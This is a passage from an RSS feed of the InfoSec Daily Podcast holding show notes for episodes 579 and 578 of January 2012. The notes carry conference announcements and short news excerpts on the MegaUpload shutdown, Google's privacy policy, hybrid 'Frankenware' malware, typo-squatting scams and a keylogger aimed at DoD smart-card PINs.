	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;The Reunion&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In most reports following the MegaUpload shutdown, the site is exclusively portrayed as a piracy haven.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, hundreds of thousands, perhaps millions of people used the site to share research data, work documents, personal video collections.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As of today, these people are still unsure whether they will ever get their personal belongings back.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a response, Pirate Parties worldwide have started to make a list of all the people affected by the raids, and they are planning to file an official complaint against the US authorities.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The widespread damage caused by the sudden closure of Megaupload is unjustified and completely disproportionate to the aim intended,&rdquo; they announce.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;For this reason Pirates of Catalonia, in collaboration with Pirate Parties International and other Pirate Parties, have begun investigating these potential breaches of law and will facilitate submission of complaints against the US authorities in as many countries as possible, to ensure a positive and just result.&rdquo; </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://billmullins.wordpress.com/2012/01/26/googles-new-policy-whats-the-problem-why-the-outrage/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://billmullins.wordpress.com/2012/01/26/googles-new-policy-whats-the-problem-why-the-outrage/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As a long standing vocal opponent of Google&rsquo;s invasive practices &ndash; and, having not stood on the sideline as the Octopus spread its tentacles &ndash; I now find myself in the uncomfortable position of defending the indefensible &ndash; those same overreaching and invasive practices.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In yesterday&rsquo;s presumptuous announcement, Google explained its new policy &ndash; with just the right amount of deceptive glitter -</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> a customer care focus.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our new policy reflects a single product experience that does what you need, when you want it to &ndash; &hellip;&hellip;. reflecting our desire to create one beautifully simple and intuitive experience across Google.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A bit of a twist on reality, I should think.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The reality being of course &ndash; Google has always</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">viewed </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">you as the product</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &ndash; </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">not</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, the customer. Yes, you the user &ndash; are a product. The customers (no, not you), are the companies that buy the targeted advertising that is directed </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">to you</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. It&rsquo;s hardly news that Google generates its revenue through targeted advertising &ndash; directed at you.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">What if two</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">computer</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> viruses got together on your computer and had a baby? </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It does happen, says security firm BitDefender, and the result is more mutant than mutt. The firm has taken to calling the third, new piece of malware produced by the odd couple &mdash; with apologies to Mary Shelley &mdash; &quot;Frankenware.&quot; The spontaneous</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">software</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> offspring might be dangerously unpredictable, and it can be harder to defend again, BitDefender says.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There are so many computer viruses flying around out there that they can&#39;t help bumping into one other while wreaking havoc on our</span><a href="http://redtape.msnbc.msn.com/_news/2012/01/27/10245683-what-if-a-virus-infected-a-virus-frankenware-spotted-by-security-firm#"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#006400;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">computers</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. In fact, virus writers account for this. In order to protect and defend a hard-won compromised computer, some virus writers actually install their own antivirus programs after they infect a PC. That way, another bad guy can&#39;t come along and hijack an already hijacked machine, said Catalin Cosoi, head of the Online Threats Lab at BitDefender, based in Romania.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="https://www.net-security.org/secworld.php?id=12275"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://www.net-security.org/secworld.php?id=12275</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A network of some 7,000 typo squatting domains is being used by scammers to effectively drive traffic towards their scammy sites, some of which get so much traffic that they managed to enter Alexa&#39;s top 250 list of sites with the largest Web traffic, say Websense researchers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The typo squatting domains take advantage of the &quot;fat-fingered&quot; visitors of popular websites such as Google, Twitter, Gmail, YouTube, Wikipedia, Victoria&#39;s Secret, Craigslist, and many more, and redirect them to spam survey sites. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.military.com/news/article/china-suspected-in-attacks-on-dod-computer-cards.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.military.com/news/article/china-suspected-in-attacks-on-dod-computer-cards.html</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber security firms have discovered a computer virus that uses servicemembers&rsquo; network security cards to hack into government networks.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">How does it work? servicemembers receive an email with an official-looking PDF file connected to the virus that allows it to record keystrokes, said Jaime Blasco, lab manager for Alien Vault, a California-based cyber security firm. The virus then collects a service member&rsquo;s personal identification number associated with a Common Access Card when he logs into a government computer.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;The hackers can get in pretty easily with this virus and do whatever they want on a government computer while a soldier just works on his computer,&rdquo; Blasco said in a phone interview from his office in Spain.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Blasco said he suspects the cyber attack originates from China because of the Chinese characters found within the virus&rsquo; coding.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-579-dude-wheres-my-porn-please-pass-the-tinfoil-virus-inception-birth-of-skynet-spamvertisement-squatnet-all-your-dod-are-belong-to-us/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3419/0/infosec-daily-podcast-episode-579.mp3" length="21400073" type="audio/mpeg" />
		<itunes:duration>0:44:32</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and w[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 579 for January 27, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: https://torrentfreak.com/megaupload-users-plan-to-sue-the-fbi-over-lost-files-120126/
In most reports following the MegaUpload shutdown, the site is exclusively portrayed as a piracy haven.
&#160;
However, hundreds of thousands, perhaps millions of people used the site to share research data, work documents, personal video collections.
&#160;
As of today, these people are still unsure whether they will ever get their personal belongings back.
&#160;
In a response, Pirate Parties worldwide have started to make a list of all the people affected by the raids, and they are planning to file an official complaint against the US authorities.
&#8220;The widespread damage caused by the sudden closure of Meg[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 578 &#8211; malwareAnywhere™, Zulu, NYPII, DoDroid &amp; Threat of the Year</title>
		<link>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year</link>
		<comments>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year#comments</comments>
		<pubDate>Fri, 27 Jan 2012 03:15:34 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3417</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.9625445182842152" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 578 for January 26, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
